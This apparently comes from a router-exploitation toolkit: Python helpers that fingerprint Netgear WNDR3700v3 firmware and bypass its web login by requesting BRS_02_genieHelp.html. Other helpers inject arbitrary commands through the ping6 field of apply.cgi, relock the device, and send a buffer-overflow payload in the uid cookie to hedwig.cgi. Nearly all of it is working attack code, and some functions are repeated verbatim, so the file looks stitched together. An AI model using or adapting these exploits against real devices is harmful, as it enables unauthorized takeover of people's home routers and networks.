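def WNDR3700_version_detect(host, logger=None):
    """Fingerprint the firmware version of a Netgear WNDR3700v3 at ``host``.

    Sends an unauthenticated GET to ``http://host/``; the 401 it is expected
    to produce carries a ``WWW-Authenticate`` basic realm naming the model.
    Only realms containing ``WNDR3700v3`` are handled. The two known
    versions are then told apart by probing ``genie_apply.htm``: a 401
    means 1.0.0.18, a successful unauthenticated response means 1.0.0.22.

    :param host: hostname or IP of the target; ``http://`` is prepended here.
    :param logger: optional object exposing ``LOG_INFO``.
    :returns: the matching entry of ``WNDR3700_VERSIONS``.
    :raises Exception: when no known version could be identified. This now
        also covers the cases the original turned into a ``NameError`` /
        ``KeyError``: a 200 on ``/``, a non-401 error, or a 401 without a
        ``WWW-Authenticate`` header.
    """
    client = HttpClient()
    version = None
    url = "http://%s" % host
    print("trying %s" % url)

    # The realm is attacker-/device-controlled input: only consult it when
    # the target actually answered with an HTTPError carrying the header.
    basic_realm = None
    try:
        client.send(url)
    except HTTPError as httpe:
        try:
            basic_realm = httpe.headers['www-authenticate']
        except (KeyError, TypeError):
            # non-401 error, or a 401 with no realm: nothing to fingerprint
            basic_realm = None

    # all known v3 firmwares put WNDR3700v3 in basic realm header
    if basic_realm and "WNDR3700v3" in basic_realm:
        document = None
        try:
            document = client.send("http://%s/genie_apply.htm" % host)
        except HTTPError as httpe:
            # 1.0.0.18 does not have genie and instead returns 401
            if httpe.code == 401:
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.18")
                version = WNDR3700_VERSIONS["1.0.0.18"]
        if document:
            # 1.0.0.22 does have genie and genie_apply.htm does not require auth
            if logger:
                logger.LOG_INFO("Got version 1.0.0.22")
            version = WNDR3700_VERSIONS["1.0.0.22"]

    if not version:
        raise Exception("WNDR3700 version not detected.")

    return version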
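def inject_command(command, target, port=80, logger=None, https=False):
    """Submit ``command`` to the target's ``ping6`` form handler via ``apply.cgi``.

    First fetches ``ping6_traceroute6_hidden_info.htm`` to obtain the form
    timestamp with ``extract_timestamp``, then POSTs ``submit_flag=ping6``
    with ``command`` placed verbatim in the ``ping6_text`` field.

    :param command: string sent as-is in ``ping6_text``; nothing is validated
        or escaped here.
    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param logger: optional logger; a ``Logging()`` instance is created if None.
    :param https: use ``https://`` instead of ``http://``.
    :raises Exception: when no timestamp could be extracted. The original
        raised a bare ``Exception()`` with no message; the message now matches
        the warning that is logged.
    """
    if not logger:
        logger = Logging()

    client = HttpClient()
    protocol = "https" if https else "http"
    base = "%s://%s:%d" % (protocol, target, port)

    url = "%s/ping6_traceroute6_hidden_info.htm" % base
    logger.LOG_INFO("Requesting ping6_traceroute6_hidden_info.htm in order to obtain timestamp.")
    resp = client.send(url)
    timestamp = extract_timestamp(resp)
    if not timestamp:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
        raise Exception("Couldn't extract timestamp from response.")
    logger.LOG_DEBUG("Got timestamp: %s" % timestamp)

    # The timestamp is spliced into the query string without URL-encoding;
    # this assumes extract_timestamp() returns a URL-safe token -- TODO confirm.
    url = "%s/apply.cgi?/ping6_traceroute6_hidden_info.htm" % base
    url += "%20timestamp=" + timestamp
    logger.LOG_DEBUG("URL: %s" % url)
    post_data = {
        "submit_flag": "ping6",
        "ping6_text": command,
        "traceroute6_text": "",
    }
    client.send(url, post_data=post_data, urlencode=True)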
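def relock_target(target, port=80, logger=None, https=False):
    """Re-lock a previously unlocked device by POSTing ``hijack_success`` to ``apply.cgi``.

    Returns early when ``is_unlocked`` reports the target as already locked.
    Otherwise fetches ``BRS_success.html`` for the form timestamp and POSTs
    ``submit_flag=hijack_success``, ``click_flag=0`` to
    ``apply.cgi?/BRS_netgear_success.html%20timestamp=<ts>``.

    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param logger: optional logger; a ``Logging()`` instance is created if None.
    :param https: use ``https://`` instead of ``http://``.
    :raises Exception: when no timestamp could be extracted. The original
        only logged a warning and then crashed with a ``TypeError`` while
        concatenating ``None`` into the URL.
    """
    if not logger:
        logger = Logging()
    protocol = "https" if https else "http"

    if not is_unlocked(target, port=port, https=https):
        logger.LOG_INFO("Target is already locked!")
        return

    client = HttpClient()
    base = "%s://%s:%d" % (protocol, target, port)
    url = "%s/BRS_success.html" % base
    logger.LOG_INFO("Requesting BRS_success.html in order to obtain timestamp.")
    resp = client.send(url)

    timestamp = extract_timestamp(resp)
    if not timestamp:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
        raise Exception("Couldn't extract timestamp from response.")
    logger.LOG_DEBUG("Timestamp: %s" % timestamp)

    # Timestamp is not URL-encoded; assumes extract_timestamp() yields a
    # URL-safe token -- TODO confirm.
    url = ("%s/apply.cgi?/" % base +
           "BRS_netgear_success.html%20timestamp=" + timestamp)
    post_data = {"submit_flag": "hijack_success",
                 "click_flag": "0"}

    client.send(url, post_data=post_data, urlencode=True)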
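def WNDR3700_version_detect(host, logger=None):
    """Fingerprint the firmware version of a Netgear WNDR3700v3 at ``host``.

    Sends an unauthenticated GET to ``http://host/``; the 401 it is expected
    to produce carries a ``WWW-Authenticate`` basic realm naming the model.
    Only realms containing ``WNDR3700v3`` are handled. The two known
    versions are then told apart by probing ``genie_apply.htm``: a 401
    means 1.0.0.18, a successful unauthenticated response means 1.0.0.22.

    :param host: hostname or IP of the target; ``http://`` is prepended here.
    :param logger: optional object exposing ``LOG_INFO``.
    :returns: the matching entry of ``WNDR3700_VERSIONS``.
    :raises Exception: when no known version could be identified. This now
        also covers the cases the original turned into a ``NameError`` /
        ``KeyError``: a 200 on ``/``, a non-401 error, or a 401 without a
        ``WWW-Authenticate`` header.
    """
    client = HttpClient()
    version = None
    url = "http://%s" % host
    print("trying %s" % url)

    # The realm is device-controlled input: only consult it when the target
    # actually answered with an HTTPError carrying the header.
    basic_realm = None
    try:
        client.send(url)
    except HTTPError as httpe:
        try:
            basic_realm = httpe.headers['www-authenticate']
        except (KeyError, TypeError):
            # non-401 error, or a 401 with no realm: nothing to fingerprint
            basic_realm = None

    #all known v3 firmwares put WNDR3700v3 in basic realm header
    if basic_realm and "WNDR3700v3" in basic_realm:
        document = None
        try:
            document = client.send("http://%s/genie_apply.htm" % host)
        except HTTPError as httpe:
            #1.0.0.18 does not have genie and instead returns 401
            if httpe.code == 401:
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.18")
                version = WNDR3700_VERSIONS["1.0.0.18"]
        if document:
            #1.0.0.22 does have genie and genie_apply.htm does not require auth
            if logger:
                logger.LOG_INFO("Got version 1.0.0.22")
            version = WNDR3700_VERSIONS["1.0.0.22"]

    if not version:
        raise Exception("WNDR3700 version not detected.")

    return version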
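def send_overflow(buf, target_ip, logger):
    """POST to ``hedwig.cgi`` on ``target_ip`` with ``buf`` as the ``uid`` cookie value.

    ``buf`` is only ``str()``-ed and placed in the ``Cookie`` header; the
    POST body is the fixed ``SERVICES=...`` string below. The ``Referer``
    is the hard-coded ``192.168.0.1`` from the original rather than
    ``target_ip`` -- presumably the device's default LAN address; confirm
    whether it matters when the target sits at another address.

    Best-effort as in the original: any exception raised by the send is
    swallowed. It is now reported through ``logger.LOG_WARN`` instead of a
    Python 2 ``print`` statement, in line with the other helpers.

    :param buf: payload placed in the ``uid`` cookie.
    :param target_ip: host or IP of the device.
    :param logger: object exposing ``LOG_INFO`` and ``LOG_WARN`` (required).
    """
    client = HttpClient()
    headers = {
        "Referer": "http://192.168.0.1/bsc_wlan.php",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Connection": "keep-alive",
        "Cookie": "uid=%s" % str(buf),
    }
    url = "http://%s/hedwig.cgi" % target_ip

    post_data = 'SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
    logger.LOG_INFO("Sending post request.")
    try:
        client.send(url, headers=headers, post_data=post_data, urlencode=True)
    except Exception as e:
        logger.LOG_WARN("Request to %s failed: %s" % (url, e))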
def unlock_target(target, port=80, logger=None, https=False):
    """Unlock the target by requesting ``BRS_02_genieHelp.html``, then verify with ``is_unlocked``.

    Returns immediately when ``is_unlocked`` already reports the device as
    unlocked. After the request the state is re-checked; if it is still
    locked a warning is logged and ``Exception("Unlock failed.")`` is raised.

    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param logger: optional logger; a ``Logging()`` instance is created if None.
    :param https: use ``https://`` instead of ``http://``.
    """
    logger = logger or Logging()
    scheme = "https" if https else "http"

    if is_unlocked(target, port=port, https=https):
        logger.LOG_INFO("Target is already unlocked.")
        return

    logger.LOG_INFO("Unlocking target.")
    unlock_url = "%s://%s:%d/BRS_02_genieHelp.html" % (scheme, target, port)
    HttpClient().send(unlock_url)

    if not is_unlocked(target, port=port, https=https):
        logger.LOG_WARN("Target unlock failed!")
        raise Exception("Unlock failed.")
    logger.LOG_INFO("Target unlocked!")
def is_unlocked(target, port=80, https=False):
    """Return True when ``index.htm`` is served without an HTTP error, False on a 401.

    The response code of any ``HTTPError`` is logged at debug level; a code
    other than 401 is re-raised to the caller.

    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param https: use ``https://`` instead of ``http://``.
    """
    log = Logging()
    scheme = "https" if https else "http"
    index_url = "%s://%s:%d/index.htm" % (scheme, target, port)

    try:
        HttpClient().send(index_url)
    except HTTPError as err:
        log.LOG_DEBUG("Got code: %s" % err.code)
        if err.code != 401:
            raise
        return False
    return True
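def fingerprint_netgear_version(target, port=80, https=False):
    """Fetch ``currentsetting.htm`` and return its ``key=value`` lines as a dict.

    A 401 or 404 yields an empty dict; any other ``HTTPError`` is re-raised.

    The body comes from an untrusted device, so parsing is tolerant: blank
    lines and lines without ``=`` are skipped (the original raised
    ``ValueError`` on them), and only the first ``=`` splits, so a value that
    itself contains ``=`` is kept whole instead of aborting the parse.

    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param https: use ``https://`` instead of ``http://``.
    :returns: dict of setting name -> value (strings), ``{}`` on 401/404.
    """
    client = HttpClient()

    protocol = "https" if https else "http"
    url = "%s://%s:%d/currentsetting.htm" % (protocol, target, port)

    try:
        resp = client.send(url)
    except HTTPError as e:
        if e.code in (401, 404):
            return {}
        raise

    fingerprint = {}
    for line in resp.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            continue
        k, v = line.split("=", 1)
        fingerprint[k] = v
    return fingerprint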
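def fingerprint_netgear_version(target, port=80, https=False):
    """Fetch ``currentsetting.htm`` and return its ``key=value`` lines as a dict.

    A 401 or 404 yields an empty dict; any other ``HTTPError`` is re-raised.

    The body comes from an untrusted device, so parsing is tolerant: blank
    lines and lines without ``=`` are skipped (the original raised
    ``ValueError`` on them), and only the first ``=`` splits, so a value that
    itself contains ``=`` is kept whole instead of aborting the parse.

    :param target: host or IP of the device.
    :param port: TCP port, default 80.
    :param https: use ``https://`` instead of ``http://``.
    :returns: dict of setting name -> value (strings), ``{}`` on 401/404.
    """
    client = HttpClient()

    protocol = "https" if https else "http"
    url = "%s://%s:%d/currentsetting.htm" % (protocol, target, port)

    try:
        resp = client.send(url)
    except HTTPError as e:
        if e.code in (401, 404):
            return {}
        raise

    fingerprint = {}
    for line in resp.splitlines():
        line = line.strip()
        if not line or "=" not in line:
            continue
        k, v = line.split("=", 1)
        fingerprint[k] = v
    return fingerprint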